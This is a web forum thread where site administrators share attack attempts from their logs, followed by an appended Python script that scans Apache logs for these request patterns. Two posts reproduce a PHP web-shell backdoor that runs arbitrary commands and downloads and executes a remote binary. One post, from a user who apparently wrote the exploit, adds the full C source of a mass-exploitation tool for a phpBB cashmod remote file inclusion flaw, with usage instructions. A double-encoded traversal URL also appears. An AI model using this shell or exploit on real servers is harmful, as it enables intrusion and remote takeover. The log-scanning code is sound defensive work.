1'm b4b0, w4tch m3 hax0r



  • From David ...

    I have a form on my web page which allows users to upload files to it (wolever.net/Uploads), and I frequently get people uploading files like exploit.php, which are promptly piped to /dev/null.  Of course, there are a few people who try uploading exploit.html and hoping it's parsed as PHP (which, of course, it's not) and I have had a couple of attempts to overwrite mod_autoindex with custom index.html files... also failures.  This is one script I found particularly interesting though...

    [b4b0.html]
    b4b0 kickin ass again.......
    System was exploited telnet to the port you have your backdoor set to listen on.
    <?
    if (isset($chdir)) @chdir($chdir);
    ob_start();
    system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
    system("cd /tmp; wget url_to_backdoor;chmod +x gota1;./gota1"); // EDIT THIS INFO!!!!!!!!!!!!!
    $output = ob_get_contents();
    ob_end_clean();
    if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
    ?>
    [/b4b0.html]

    Note the line which says EDIT THIS INFO.



  • That's great .... quite a hacker! 



  • People seem to think that this URL will work to hack my apache on a Linux box...

    /scripts/..%255c%255c../winnt/system32/cmd.exe

    hmm yeah right.

    Also they try the Too Long URL exploit that works on old versions of IIS... LOL

    Drak



  • @Drak said:

    People seem to think that this URL will work to
    hack my apache on a Linux box...

    Those are just scripted worm
    attacks so they are just "trying their luck".



  • L053r5 is what they are [:P]

    Almost all are probably kiddies on the same provider as I am anyway.


    Drak



  • Also, it is possible with many web services (www, smtp, whatever) to
    put whatever "banner" string they want for incoming connections.
    Therefore, people have IIS installs saying they are apache, and vice
    versa.  As a result of this, port scanners and script kiddie tools
    generally have options to ignore host banners and attempt all known
    exploits of ANY provider on that port.




  • As far as server logs go, I used to look at my apache log with
    amusement, seeing many entries like the one mentioned above.  I'm
    pretty confident in my apache install, so I really don't even look at
    that file anymore...



    The other entertaining log is the SSH connection log.  On a daily
    basis, 1 or more people using spoofed IP addresses attempt to log in
    with a static set of about 20 usernames and passwords.  Same 20
    every time.  It has to be part of some script kiddie toolkit or
    something, since I can't imagine the same person trying the same
    combination every day to see if maybe I finally DID create a user named
    "admin" with a password of "password".  This has been
    ongoing for over a year.






  • I love this guy: http://www.gulftech.org/tools/base64.pl

    Not only is he referring to Base64 "Encryption", he also logs everyone's conversions into a file in /tools/. Some of the things people are "Encrypting" are pretty funny ;)



  • Actually, Blue, I didn't take the lines from my log file. It's number 20 of the 20 most often requested non-existent pages in my statistics. [:D]

    I remember killing off my FTP server because 2 people were doing a hack attempt using things like 'administrator,system' etc as username and password. I reported their IP to their ISP and they got an official warning. If they ever do it again their connection will be terminated. Muhahaha. That'll teach them.

    Drak



  • You're lucky in that regard - my script kiddies spoof their IP address, so I have no idea who to complain to...



    About 6 months ago, I saw some that did appear to reverse-map, and did
    complain.  Never got a single response from any of the ISPs I
    contacted.  (none were major ISPs)






  • In my case it probably helped having the most expensive non-business subscription for my ISP.

    Hey any clue to find out from the apache logs where all the hits to an image that I USED to have, but no longer have, are coming from? I think someone has used it on a forum as an avatar, but I cannot seem to find it on any of the referring pages that I can see in the statistics.

    Drak



  • I don't know of any tool that does it, but if you know the image
    filename, it should be quite easy.  Do an egrep using a regular
    expression that either includes all lines with that image filename, or
    to be more specific, lines with that image filename and a 404 result.



    HTH




  • Hello,

    Here is what it actually is from b4b0-phpBB.tgz. This is a phpBB cashmod exploit. You also might wanna do some research on bahbo before you start jumping to conclusions.. Whoever attempted to use this on you was a moron and should not be allowed to use a computer....

    Cheers,

    evilrabbi

    /* b4b0.php */

    b4b0 kickin ass again.......
    System was exploited telnet to the port you have your backdoor set to listen on.
    <?
    if (isset($chdir)) @chdir($chdir);
    ob_start();
    system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
    system("cd /tmp; wget url_to_backdoor;chmod +x backdoor_name;./backdoor_name"); // EDIT THIS INFO!!!!!!!!!!!!!
    $output = ob_get_contents();
    ob_end_clean();
    if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
    ?>

    /* code for mass exploitation */

    /*
    exploit for phpBB 1.0.0 - 2.0.10
    edit the b4b0.php file with the correct url to your backdoor and the correct filename for your backdoor upload it to
    a webserver.
    gcc -o b4b0-phpbb b4b0-phpbb.c
    ./b4b0-phpbb <url_to_system> <phpbb_dir> <url_to_b4b0.php>
    telnet <url_of_exploited_system> <port_of_back_door>
    greets to b4b0
    -- evilrabbi
    */

    #include <stdio.h>
    #include <string.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>

    void help(char *program_name);

    int main(int argc, char *argv[]) {
        struct sockaddr_in trg;
        struct hostent *he;
        int sockfd, buff;
        char buffer[1024];
        char *request;

        if(argc != 4 ) {
            help(argv[0]);
            exit(0);
        }

        he = gethostbyname(argv[1]);
        sockfd = socket(AF_INET, SOCK_STREAM, 0);
        request = (char *) malloc(1024);

        trg.sin_family = AF_INET;
        trg.sin_port = htons(80);
        trg.sin_addr = *((struct in_addr *) he->h_addr);
        memset(&(trg.sin_zero), '\0', 8);

        connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr));
        sprintf(request,"GET http://%s/%s/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://%s?cmd=w\n",argv[1],argv[2],argv[3]);
        send(sockfd,request,strlen(request),0);
        buff=recv(sockfd, buffer, 1024-1, 0);
        buffer[buff] = '\0';
        printf("%s",buffer);
        close(sockfd);
        return 0;
    }

    void help(char *program_name) {
        printf("b4b0-phpbb.c by evilrabbi for b4b0\n\n");
        printf("%s hostname phpbb2_dir url_to_bad_php\n",program_name);
        printf("%s www.example.com phpBB2 blah.com/b4b0.php.php\n",program_name);
    }
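An added example, not posted by anyone in this thread: a small Apache combined-log check that does the egrep job suggested for Drak's missing-image question (referers of 404 hits on a given path) and also flags the two request shapes shown above, a remote URL passed as a parameter (the phpbb_root_path trick the C code sends) and the double-encoded "%255c" traversal URL. The log lines, IPs and hostnames are constructed placeholders, not anyone's real log.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Apache "combined" format; the HTTP-version group is optional so that the
# version-less "GET ...\n" request the C code above sends is still parsed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>[^"\s]+)(?: [^"\s]+)?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample lines (placeholder hosts and IPs, not a real log).
SAMPLE = """\
198.51.100.7 - - [12/Mar/2005:10:01:02 +0000] "GET /images/drak.gif HTTP/1.1" 404 298 "http://forum.example/viewtopic.php?t=42" "Mozilla/4.0"
198.51.100.8 - - [12/Mar/2005:10:03:15 +0000] "GET /images/drak.gif HTTP/1.1" 404 298 "http://forum.example/viewtopic.php?t=42" "Mozilla/4.0"
203.0.113.9 - - [12/Mar/2005:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
203.0.113.9 - - [12/Mar/2005:10:05:01 +0000] "GET http://www.example.com/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://attacker.example/b4b0.php?cmd=w" 200 512 "-" "-"
203.0.113.10 - - [12/Mar/2005:10:06:00 +0000] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe HTTP/1.0" 404 0 "-" "-"
"""

def parse_line(line):
    """Return the fields of one combined-format line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def referers_for_missing(lines, image_path):
    """Map referer -> number of 404 hits on image_path (who is still linking the image)."""
    counts = {}
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == "404" and rec["path"].split("?", 1)[0] == image_path:
            counts[rec["referer"]] = counts.get(rec["referer"], 0) + 1
    return counts

def suspicious_requests(lines):
    """Return (ip, reason, path) for requests carrying a remote URL in a query
    parameter, or a directory traversal that only shows up after double URL-decoding."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        path = rec["path"]
        params = parse_qs(urlparse(path).query)
        if any(v.lower().startswith(("http://", "https://", "ftp://"))
               for values in params.values() for v in values):
            hits.append((rec["ip"], "remote url in parameter", path))
        decoded = unquote(unquote(path))  # %255c -> %5c -> backslash
        if "../" in decoded or "..\\" in decoded:
            hits.append((rec["ip"], "directory traversal", path))
    return hits
```

Run it over a real access_log with `suspicious_requests(open("access_log").read().splitlines())`; anything flagged that returned 200 (as the constructed cashmod line does) is the one worth following up on.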
